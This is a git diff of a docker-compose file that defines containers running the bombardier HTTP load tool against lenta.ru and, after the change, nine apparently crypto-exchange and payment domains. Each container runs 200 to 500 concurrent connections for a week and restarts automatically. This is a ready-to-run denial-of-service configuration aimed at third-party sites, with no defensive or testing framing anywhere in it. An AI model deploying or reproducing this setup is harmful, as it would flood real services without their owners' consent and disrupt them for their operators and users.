--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -7,8 +7,56 @@ services:
     restart: always
     command: -c 500 -d 604800s -l lenta.ru
 
-  google.com:
-    container_name: google.com
+  https://cleanbtc.ru:
+    container_name: https://cleanbtc.ru
     image: alpine/bombardier
     restart: always
-    command: -c 200 -d 604800s -l google.com
+    command: -c 200 -d 604800s -l https://cleanbtc.ru
+
+  https://bonkypay.com:
+    container_name: https://bonkypay.com
+    image: alpine/bombardier
+    restart: always
+    command: -c 200 -d 604800s -l https://bonkypay.com
+
+  https://changer.club:
+    container_name: https://changer.club
+    image: alpine/bombardier
+    restart: always
+    command: -c 200 -d 604800s -l https://changer.club
+
+  https://superchange.net:
+    container_name: https://superchange.net
+    image: alpine/bombardier
+    restart: always
+    command: -c 200 -d 604800s -l https://superchange.net
+
+  https://mine.exchange:
+    container_name: https://mine.exchange
+    image: alpine/bombardier
+    restart: always
+    command: -c 200 -d 604800s -l https://mine.exchange
+
+  https://platov.co:
+    container_name: https://platov.co
+    image: alpine/bombardier
+    restart: always
+    command: -c 200 -d 604800s -l https://platov.co
+
+  https://ww-pay.net:
+    container_name: https://ww-pay.net
+    image: alpine/bombardier
+    restart: always
+    command: -c 200 -d 604800s -l https://ww-pay.net
+
+  https://delets.cash:
+    container_name: https://delets.cash
+    image: alpine/bombardier
+    restart: always
+    command: -c 200 -d 604800s -l https://delets.cash
+
+  https://betatransfer.org:
+    container_name: https://betatransfer.org
+    image: alpine/bombardier
+    restart: always
+    command: -c 200 -d 604800s -l https://betatransfer.org
